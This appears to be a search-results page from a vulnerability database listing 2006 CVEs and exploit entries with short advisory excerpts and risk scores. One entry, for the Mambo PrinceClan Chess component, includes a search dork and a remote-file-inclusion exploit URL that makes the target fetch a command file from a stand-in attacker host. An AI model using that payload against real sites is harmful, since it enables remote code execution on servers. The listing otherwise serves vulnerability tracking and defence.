2026 matches found

exploitpack
added 2006/09/29 12:0 a.m., 25 views

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...

7.5 AI score
Exploits 0

NVD
added 2006/09/27 7:7 p.m., 22 views

CVE-2006-4694

Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and...

9.3 CVSS, 7 AI score, 0.12149 EPSS
Exploits 4, References 15

CVE
added 2006/09/26 1:43 a.m., 61 views

CVE-2006-4990

CVE-2006-4990 describes PHP remote file inclusion vulnerabilities in PhotoPost 4.0–4.6 where an attacker can execute arbitrary PHP code by supplying a URL to the PP_PATH parameter across multiple PHP scripts (e.g., zipndownload.php and others). The issue enables code execution via network access ...

7.5 CVSS, 7.6 AI score, 0.02491 EPSS
Exploits 0, References 32, Affected Software 1

Exploit DB
added 2006/09/13 12:0 a.m., 39 views

e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting

source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user i...

7.4 AI score
Exploits 0

Exploit DB
added 2006/07/24 12:0 a.m., 48 views

Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...

7.4 AI score
Exploits 0

Exploit DB
added 2006/07/18 12:0 a.m., 79 views

Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation

/ $Id: raptorprctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ raptorprctl2.c - Linux 2.6.x suiddumpable2 logrotate Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...

4.6 CVSS, 7.4 AI score, 0.04387 EPSS
Exploits 17

Symantec
added 2006/07/11 12:0 a.m., 29 views

Microsoft Excel COLINFO Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...

8.2 AI score
Exploits 0, References 2, Affected Software 2

Symantec
added 2006/07/11 12:0 a.m., 71 views

Microsoft Excel LABEL Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...

8.2 AI score
Exploits 0, References 1, Affected Software 2

Symantec
added 2006/07/11 12:0 a.m., 18 views

Microsoft Excel OBJECT Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...

8.2 AI score
Exploits 0, References 1, Affected Software 2

exploitpack
added 2006/07/06 12:0 a.m., 18 views

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...

0.1 AI score
Exploits 0

Exploit DB
added 2006/07/06 12:0 a.m., 26 views

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution

source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...

7 AI score
Exploits 0

Prion
added 2006/06/26 10:6 a.m., 10 views

Directory traversal

Unspecified vulnerability in pinball 0.3.1 allows local users to gain privileges via unknown attack vectors that cause pinball to load plugins from an attacker-controlled directory while operating at raised privileges...

4.6 CVSS, 6.5 AI score, 0.00354 EPSS
Exploits 0, References 6, Affected Software 1

exploitpack
added 2006/06/15 12:0 a.m., 16 views

Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting

Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...

Exploits 0

exploitpack
added 2006/04/20 12:0 a.m., 9 views

Manic Web MWGuest 2.1 - MWguest.php HTML Injection

Manic Web MWGuest 2.1 - MWguest.php HTML Injection source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HT...

7.6 AI score
Exploits 0

exploitpack
added 2006/04/10 12:0 a.m., 10 views

PHPWebGallery 1.4.1 - picture.php Cross-Site Scripting

PHPWebGallery 1.4.1 - picture.php Cross-Site Scripting source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may...

6.8 AI score
Exploits 0

exploitpack
added 2006/04/07 12:0 a.m., 11 views

Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities

Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/17406/info Bitweaver CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacke...

7 AI score
Exploits 0

Exploit DB
added 2006/04/04 12:0 a.m., 17 views

UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)

source: https://www.securityfocus.com/bid/17378/info UltraVNC is susceptible to multiple error-logging remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied input before copying it to insufficiently sized memory buffers. A...

7 AI score
Exploits 0

UbuntuCve
added 2006/03/15 7:6 p.m., 26 views

CVE-2006-1244

Unspecified vulnerability in certain versions of xpdf after 3.00, as used in various products including (a) pdfkit.framework, (b) gpdf, (c) pdftohtml, and (d) libextractor, has unknown impact and user-assisted attack vectors, possibly involving errors in (1) gmem.c, (2) SplashXPathScanner.cc, (3) JBIG2Stream.c...

7.6 CVSS, 5.9 AI score, 0.02139 EPSS
Exploits 0, References 2

exploitpack
added 2006/02/11 12:0 a.m., 21 views

ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload

ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content...

0.8 AI score
Exploits 0

Prion
added 2006/01/04 12:3 a.m., 17 views

Buffer overflow

Buffer overflow in termsh on SCO OpenServer 5.0.7 allows remote attackers to execute arbitrary code via a long -o command line argument. NOTE: this is probably a different vulnerability than CVE-2005-0351 since it involves a distinct attack vector...

7.5 CVSS, 8.3 AI score, 0.04778 EPSS
Exploits 1, References 3, Affected Software 1